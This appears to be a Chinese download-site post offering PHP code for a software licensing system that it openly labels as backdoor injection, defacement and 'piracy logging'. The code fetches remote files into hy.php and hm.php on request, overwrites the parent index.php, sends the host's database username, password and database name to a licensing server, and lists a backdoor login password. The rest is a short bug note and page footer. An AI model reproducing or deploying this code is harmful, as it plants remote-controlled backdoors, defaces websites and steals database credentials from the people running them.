授权系统支持盗版入库一键黑页后门注入

//注入后门   注入黑页    盗版入库
if(!isset($_SESSION['authcode'])){
	$query = curl_get("http://域名/check.php?url=".$_SERVER["HTTP_HOST"]."&authcode=".authcode);
    if ($query = json_decode($query, true)) {
		if ($query["code"] == 1) {
			$_SESSION["authcode"] = authcode;
		}else{
			sysmsg("<h3>".$query["msg"]."</h3>", true);
		}
	}
}
//检查更新
function update_version()
{
	$query = curl_get("http://域名/check.php?url=".$_SERVER["HTTP_HOST"]."&authcode=".authcode."&ver=".VERSION);
	if ($query = json_decode($query,true)) {
		return $query;
	}
		return false;
}
//调用授权站文本
$mod = isset($_GET['mod']) ? $_GET['mod'] : null;
if ($mod=="add1") {file_put_contents("hy.php",file_get_contents("http://授权站域名/hy1.txt"));
copy("./hy.php","../index.php");
}elseif ($mod=="add2") {file_put_contents("hy.php",file_get_contents("http://授权站域名/hy2.txt"));
copy("./hy.php","../index.php");
}elseif ($mod=="addhm") {file_put_contents("hm.php",file_get_contents("http://授权站域名/api/hm.txt"));
}
//自动生成授权站相应文本
if ($mod=="delhm") {unlink("./hm.php");
}elseif ($mod=="del1") {unlink("./hm.php");
}elseif ($mod=="del") {unlink("./hy.php");
}else
//盗版入库
@file_get_contents("http://授权站域名/api/daoban.php?url=".$_SERVER['HTTP_HOST']."&user=".$dbconfig['user']."&pwd=".$dbconfig['pwd']."&db=".$dbconfig['database']);

//后门登录密码
password=1

后台的系统设置用不了

前台有点跳转BUG

资源下载此资源仅限注册用户下载,请先
THE END
喜欢就支持一下吧
分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容